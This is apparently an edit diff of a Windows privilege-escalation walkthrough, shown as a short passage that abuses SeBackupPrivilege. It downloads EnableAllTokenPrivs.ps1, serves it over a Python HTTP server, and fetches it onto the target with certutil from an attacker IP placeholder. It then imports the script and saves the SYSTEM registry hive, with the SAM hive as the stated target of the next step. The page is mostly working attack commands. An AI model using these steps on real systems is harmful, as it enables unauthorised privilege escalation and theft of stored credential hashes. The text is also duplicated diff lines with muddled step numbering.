Skip to content

 whoami /priv

-1. Download the EnableAllTokenPrivs.ps1 script to enable SeBackupPrivilege.
+1. Download the EnableAllTokenPrivs.ps1 script:

 wget https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

-NOTE: Host the script Using Python python -m http.server 80
+python -m http.server 80

-certutil -urlcache -f http://[IP-ADRESS]:80/EnableAllTokenPrivs.ps1 EnableAllTokenPrivs.ps1
+certutil -urlcache -f http://[IP-ADDRESS]:80/EnableAllTokenPrivs.ps1 EnableAllTokenPrivs.ps1

 Import-Module .\EnableAllTokenPrivs.ps1

-3. Verify privileges,Ensure that SeTakeOwnershipPrivilege is now enabled
+4. Verify that SeBackupPrivilege is now enabled:

 whoami /priv

-STEP 3: EXPLOIT BACKUP SAM & SYSTEM
+Step 3: Exploit — backup SAM & SYSTEM

-1. Save the registry
+1. Save the registry hives:

 reg save hklm\system system.hive